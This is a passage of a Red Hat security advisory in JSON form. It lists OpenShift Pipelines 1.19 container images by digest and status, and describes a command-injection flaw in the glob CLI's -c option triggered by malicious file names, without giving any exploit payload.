"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:b5ecf03805d9637084db625b5ad3f5c112287d39a2995548208ef7d9f53c925b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2415451"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in glob. This vulnerability allows arbitrary command execution via processing files with malicious names when the glob command-line interface (CLI) is used with the -c/--cmd option, enabling shell metacharacters to trigger command injection.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "glob: glob: Command Injection Vulnerability via Malicious Filenames",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw in glob allows arbitrary command execution when the `glob` command-line interface is used with the `-c/--cmd` option to process files with malicious names. The vulnerability is triggered by shell metacharacters in filenames, leading to command injection. The glob CLI tool utilizes the -c option to execute shell commands over the files which matched the searched pattern by using the shell:true parameter when creating the subprocess which will further execute the command informed via \u0027-c\u0027 option, this parameter allows the shell meta characters to be used and processed when executing the command. Given that information glob misses to sanitize the file name to eliminate such characters and expressions from the filename, leading to code execution as when performing the shell expansion such characters will be interpreted as shell commands.\n\nTo exploit this vulnerability the targeted system should run the glob CLI over a file with a maliciously crafted filename, additionally the attacker needs to have enough permission to create such file or trick the user to download and process the required file with the glob CLI.\n\nThis flaw is present in the command line interface of the nodejs-glob package. When the package is used by npm, the command line interface is not used at all, so it cannot be triggered. However, the command line interface implementation is still present on the system, but not directly exposed to the user\u0027s $PATH. To reflect this condition, nodejs packages have been rated with a low severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:4f8b2b98e3624a07f121a479dba5368701669f6d444a718883df6b4bf46500bf_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:5c786e81facc28108221a2a85e2811b145c4ac5cc0c9c5d1c8b79f518dfc42c2_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:a4ab9fd58865390a4a6d85dc2d91505737539fb547e2b17c57cb72be0acbcf0a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:1a7f6edbd72dd5e86ca19dd3b57987362dbc17aad5b4bf07eb259ada71c270c9_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:068909009a477b980a6b50396a168b1a62235dd203e63a5f11065bb053fbd89c_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:fe1af3bd9efe149c6567a5f14a5b48e2b1b9f41997b081b18cab513b59b55e87_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:4b0c865ca819b32dedd280dc301e719f0efa14e054dd82e43097837ef2627e3f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:96b66b1b98dc3e1f95aefcf6d0aea9aa7bb9115bcfdf8ae0206da8fe502d7a4a_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:cdebcfc74dfb2de9d328776d07b8846b0e0394847b72c484a04003edb089cfc4_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:c2072b2c1d3e607cf82e3678325182f6e595f5ea5685385d1cbcad08ef79b61b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:4bf12507f84feb54b8596eb0cd06a0ef7e9f49ebe9c25cc48efb21c89a0d4a07_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:b6397b063b854abc7f6fdede2081a4277f8a528b59778bd944429b28e8f83bc1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:63347f53f578ccf70a1ca6ea0ba6cae0baf61bb4331f3800c237104d2d16fb6d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:66789297ade19ca33e74ab6b605e812e36af59d4f6fc6c9721624cb7f7e1b900_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:86baeaf3dbddd6ff68a23ae5af5066c65dddb0b99094f89d4d6cbc504f42b75e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:6ff2fcc539c9a43c39976dc704456ecf125256412b10bbebe8f9313ccecb63fb_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:0152bc65a48f3f6f8080fe4ce2802c1ea17590cf05bc9d499d1bc844f8d2432e_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:689c505b0dcc89d07d202bb6d6a9bfd6bd4b42438204c1ab79fb050f4bb97fd1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:63bb3bf9efc2a56f0c5439dfc527437568cb7df62ff7d42d3ce67aa665a1807b_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:389107e5b5fecdc46867c8e6630260de717fb4296f8ef7060db1b7f8e28b565d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:e8cf6c64e666e7fbe6d98137e96f098359446a43b7f2213d071a9e87dae20292_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:13e8cf0de71719fe4607daf9410a5fb65d6b9747194463fdc52441964fa6e1f8_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:1663f49305a449ac0184ee79ee021f6949a54f6cd8bf573f56c49bb960306a3d_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:4b8856061808ecbd2c93d4395d4f1328638978512d2f01b5e8f5b649923a8555_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:2f0d963fdd9681a026c7b377e23090269cccafbca34861b19f3c974f78f8693f_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:ffbfd0a65b5cd53ad78e186f5d4ef61fe82212f6fd3edba21c97b2c7bbb4104d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:457f91cc3f0aa5489e2c2049df1d9aaa56a52b3c0d9a1e2077455e1aefd5e1fd_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c8ec07d2152c1de4ef01a848b95c87f0ae4794c25bd6ee80f649f00e38d7218a_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:c2af4a8295ef22ec95616fa4fa7c92502343b726d510b58bbac5fd40d994884d_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:2fd78839231af7af848ca3ca4eda3a3d399a58a8c5c72150b84c7221e1760143_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:e5c9687b321c0efb0a5ef6cb5bb43a06cb79e8e4c379d045210b7ef18b8bb4e1_s390x",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
